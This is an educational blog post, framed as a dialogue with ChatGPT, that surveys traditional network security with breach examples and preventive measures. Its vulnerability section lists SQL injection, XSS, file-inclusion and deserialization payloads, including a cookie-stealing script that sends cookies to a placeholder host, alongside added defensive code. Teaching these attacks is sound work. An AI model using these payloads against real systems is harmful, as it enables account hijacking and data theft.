ChatGPT: Do you really understand cybersecurity? Talking about traditional network security when attack defense is in progress

ChatGPT (full name: Chat Generative Pre-trained Transformer) is a chatbot program developed by OpenAI in the United States; it is a natural language processing tool driven by artificial intelligence technology.

Drawing on the characteristics of its large language model, its controllability, and its high scalability, this article discusses the progress of network security attack and defense through a conversation with ChatGPT.

Series index:
ChatGPT: Do you really understand network security? Talking about traditional network security when network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the new definition of network security when network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the New Threats of Network Attacks During Network Security Attack Defense

ChatGPT: Do you really understand cybersecurity? Talking about the new defense of network security when the network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the new summary of network security when network security attack defense is in progress

Traditional network security

Question to ChatGPT: What is traditional network security, and what are its main aspects?
ChatGPT answers as follows:

Traditional network security mainly refers to the protection and defense measures for computer network systems, intended to protect computer networks from attack, damage, or theft of sensitive data.

Based on the general understanding and practice in the field of network security, traditional network security mainly includes the following aspects:

1. Firewall

Threats: Malicious attacks such as intrusions, Trojan horses, and viruses. Hackers may break through the firewall via vulnerabilities or social engineering, then attack and tamper with the system from inside.

In 2013, the network systems of the US retail giant Target were attacked by hackers, leading to the leak of nearly 7 million credit card records. The investigation showed that the hackers logged into Target's network through a vendor's account, then exploited a vulnerability to bypass the firewall, and finally broke into the system and stole a large amount of sensitive data.

Preventive measures: Strengthen the security and reliability of the firewall, including setting complex passwords and regularly updating software. In addition, advanced security devices such as IPS and IDS can perform deep inspection of network traffic to detect and block potential attacks in a timely manner.

2. Encryption technology

Threats: data leakage, theft and tampering, etc. Hackers may steal encrypted data by intercepting packets, malware, etc., and tamper with it.

In 2017, the US credit reporting company Equifax, one of the world's largest financial institutions, suffered one of the largest data breaches in history: the personal information and Social Security numbers of more than 143 million people were stolen. The investigation found that the hackers had exploited a known vulnerability to bypass Equifax's encryption mechanism and obtain a large amount of sensitive data.

Some encryption algorithms have been widely recognized as insecure or vulnerable, such as:

MD5: MD5 is a commonly used hash algorithm, but it has been shown to have serious weaknesses and collision attacks, and it is no longer suitable for security-sensitive applications.

SHA-1: SHA-1 is also a common hash algorithm, but it has been shown to suffer from serious collision attacks and security problems, and it is recommended that it no longer be used.

RC4: RC4 is a symmetric encryption algorithm that was once widely used in many applications. However, it has been shown to have serious security problems, and it is recommended that it no longer be used.

Preventive measures: use more secure encryption algorithms and key management mechanisms, and also need to verify the randomness, unpredictability and integrity of the encryption protocol. In addition, technologies such as digital certificate authentication are used to ensure the identity authenticity and information security of both communication parties.


3. Authentication and authorization

Threats: password cracking, fake identities, etc. Hackers may obtain account passwords and identity certificates of legitimate users through brute force cracking, social engineering, phishing, etc., to gain unauthorized access.

In 2018, Facebook suffered a large-scale hacker attack affecting the accounts of more than 50 million users. The hackers exploited a code vulnerability to steal a large number of access tokens, thereby obtaining users' personal information and private messages. The incident directly exposed vulnerabilities in Facebook's authentication mechanism and also drew attention to privacy on social media.

Preventive measures: adopt more secure and complex password policies and authentication mechanisms, such as multi-factor authentication. In addition, strict access control and audit mechanisms need to be implemented to avoid unauthorized access and malicious behavior.

4. Vulnerability management

Threat: Hackers may exploit system vulnerabilities to attack and infiltrate.

In 2019, the US government cybersecurity agency NSA issued a warning that hacker groups were exploiting vulnerabilities to attack the VPN portals of some victims. These attacks were referred to as "Pulse Secure VPN" attacks: the hackers exploited vulnerabilities in specific versions of the VPN to obtain administrator privileges, execute code, and steal sensitive data.

Common attack methods of SQL injection:

select * from users where name='qiu' or 1=1 # and password='xxx'

select * from user where name='qiu' or 1=1 #' and pass=''

SELECT * FROM users WHERE id=1 AND 1=(SELECT COUNT(*) FROM users GROUP BY CONCAT_WS(':', username, password));

SELECT * FROM users WHERE name='输入的用户名';

SELECT * FROM users WHERE name='' CONVERT(int, (SELECT TOP 1 password_hash FROM users)) 
-- ';

SELECT * FROM users WHERE username = 'qiu'--'  AND password = 'xx'

SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) > 0

SELECT * FROM users WHERE username='admin' UNION SELECT credit_card_number, expiration_date FROM credit_cards

SELECT * FROM users WHERE username='admin' UNION SELECT NULL,NULL,NULL FROM information_schema.tables --

For details, please refer to: [Network Security] A Brief Analysis of SQL Injection Principles and Common Attack Methods

Common xss attack methods:

Basic PAYLOAD:

<script>alert('XSS')</script>

An alert box pops up directly


Image loading PAYLOAD:

<img src=x onerror="alert('XSS!')">

When this image is loaded, a malicious script will be triggered


Link to jump PAYLOAD:

<a href="javascript:alert('XSS')">点击我</a>

When the user clicks on the link, the script in it is executed


Cookie stealing PAYLOAD:

<script>new Image().src="http://xx.com/steal.php?cookie="+document.cookie;</script>

Send the user's cookie information to the remote server


Jump to the fake login page PAYLOAD:

<script>document.location="http://xx.com/login.php?user="+document.cookie;</script>

Pretending to be a login page to trick users into submitting usernames and passwords
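As an added example that is not part of the original post, the output-side defence against the payloads listed above: context-aware encoding of untrusted text with Python's html module, plus a scheme allowlist for user-supplied links so that a javascript: URL never reaches an href. The function and constant names are my own.

```python
import html
from urllib.parse import urlsplit

# Only these link schemes may appear in an href; javascript:, data:, vbscript: etc. are refused
ALLOWED_SCHEMES = {"http", "https"}


def escape_text(user_text: str) -> str:
    """Encode for an HTML text node or a double-quoted attribute value.
    <, >, &, " and ' become entities, so <script> and onerror= stay inert."""
    return html.escape(user_text, quote=True)


def safe_href(user_url: str) -> str:
    """Allow http(s) URLs and site-relative paths; anything else becomes '#'."""
    url = user_url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme in ALLOWED_SCHEMES:
        return escape_text(url)
    if scheme == "" and url.startswith("/") and not url.startswith("//"):
        return escape_text(url)  # site-relative path, no scheme or host
    return "#"


def render_comment(author: str, body: str, link: str) -> str:
    """Build comment markup with every untrusted value encoded for its context."""
    return (
        f'<p class="comment"><a href="{safe_href(link)}">{escape_text(author)}</a>: '
        f"{escape_text(body)}</p>"
    )
```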


Common file inclusion attack methods:

Relative path payload: Some applications allow users to enter a relative path, and an attacker can use relative path qualifiers such as "../" to access files outside the application directory.

../etc/passwd (lists all Linux user accounts other than root)

Absolute path payload: Attackers can use absolute paths to access files in the system, such as /etc/passwd.

Null byte payload: Some applications only recognize the characters before the null byte when processing a file name and ignore the content after it. An attacker can therefore add "%00" or "\0" (the null character) to the file name, tricking the application into accessing only the file they specify.

../../../../../../../../../../etc/passwd%00

PHP pseudo-protocol payload: If the application uses PHP as the server-side script interpreter, an attacker can use PHP pseudo-protocols (stream wrappers) to access remote files.

php://filter/convert.base64-encode/resource=../../../etc/passwd

Other protocol payload: In addition to the php protocol, attackers can also use other protocols to read remote files, such as file, ftp, etc.

file:///etc/passwd
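As an added example that is not part of the original post, one way to validate a user-supplied file name before including it: decode once, reject null bytes and stream-wrapper prefixes, then resolve the path and confirm it is still inside the allowed directory. BASE_DIR is an assumed location chosen for the example.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed directory the application is allowed to serve files from
BASE_DIR = os.path.realpath("/var/www/app/files")


def resolve_safe_path(user_path: str) -> Optional[str]:
    """Return the absolute path under BASE_DIR, or None if the request is unsafe."""
    decoded = unquote(user_path)      # %00 -> "\x00", %2e%2e -> ".."
    if "\x00" in decoded:             # null-byte truncation trick
        return None
    if "://" in decoded:              # php://, file://, ftp:// wrappers
        return None
    if os.path.isabs(decoded):        # absolute paths such as /etc/passwd
        return None
    # realpath collapses ../ segments and symlinks before the containment check
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None                   # ../ walked out of the base directory
    return candidate
```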

Common serialization and deserialization attack methods:
Java payload: A common serialization and deserialization attack method in Java is to use the ObjectInputStream class. The attacker can construct a serialized object containing malicious code, for example:

import java.io.Serializable;

public class Exploit implements Serializable {
    public Exploit() throws Exception {
        Runtime.getRuntime().exec("calc.exe");
    }
}

This object is then serialized and sent over the network to the target application, where running the serialized object executes malicious code (in this case, opening a calculator).

PHP payload: A common serialization and deserialization attack method in PHP is to use the unserialize function to execute arbitrary code. An attacker can construct a serialized string containing malicious code, for example:

O:6:"Exploit":0:{}

When the application parses this string using the unserialize function, malicious code is executed.

Python payload: Python supports serialization and deserialization of objects using the pickle module. An attacker can construct malicious code and use pickle.dump to serialize it, for example:

import os

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('calc.exe',))

Then send the serialized malicious code to the target system, and use pickle.load to execute the malicious code.
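As an added example that is not part of the original post, the defensive counterpart to the Python payload above: a restricted Unpickler whose find_class only resolves allow-listed globals. The constructed Surprise class points its __reduce__ at os.getcwd, a harmless stand-in for the os.system call shown in the post, which is enough to show that plain pickle.loads calls whatever the bytes reference while the restricted loader refuses.

```python
import collections
import io
import os
import pickle


class Surprise:
    """Constructed demo class: deserialising it calls os.getcwd (harmless here)."""
    def __reduce__(self):
        return (os.getcwd, ())


# Globals the application legitimately expects inside its own pickles
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any module.name that is not on the allowlist."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    """Run the same bytes through both loaders and report what happened."""
    evil = pickle.dumps(Surprise())
    expected = collections.OrderedDict(user="qiu", id=1)
    benign = pickle.dumps(expected)
    result = {"plain_called_getcwd": isinstance(pickle.loads(evil), str)}
    try:
        restricted_loads(evil)
        result["restricted_blocked"] = False
    except pickle.UnpicklingError:
        result["restricted_blocked"] = True
    result["benign_ok"] = restricted_loads(benign) == expected
    return result
```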


Preventive measures: Establish and implement a sound vulnerability management system to discover and repair system vulnerabilities in a timely manner. At the same time, regular vulnerability scanning and assessment are also required to ensure the security and stability of the system.

5. Security policy

Threats: Factors such as imperfect security policies and inadequate implementation may lead to system hacking and intrusion.

In 2007, China Mobile was fined because its bulk SMS function was easily abused for illegal activities, which directly exposed flaws and gaps in its security policy. China Mobile subsequently strengthened supervision and management of its SMS platform and strengthened its technology and applications for electronic authentication and authorization, improving its ability to identify and prevent illegal behavior.

Preventive measures: Establish sound security policies and rules, including network access control, data backup, emergency response, etc. At the same time, it is also necessary to strengthen the training and awareness education of employees, improve their security awareness and capabilities, and reduce the impact of human factors on system security.

Question to ChatGPT: What is the focus of traditional network security?
ChatGPT answers as follows:

Traditional network security measures focus on defending against external attacks and threats to ensure the security and stability of computer networks. However, with the rapid development of the digital age and the continuous improvement of informatization, network security is facing more and more challenges and new threats.


Summary

The above is a brief discussion of traditional network security when attack defense is in progress.

Follow me to meet new attack techniques and absorb new network security knowledge.

I am Qiu Shuo; see you next time.

Origin blog.csdn.net/2301_77485708/article/details/130837302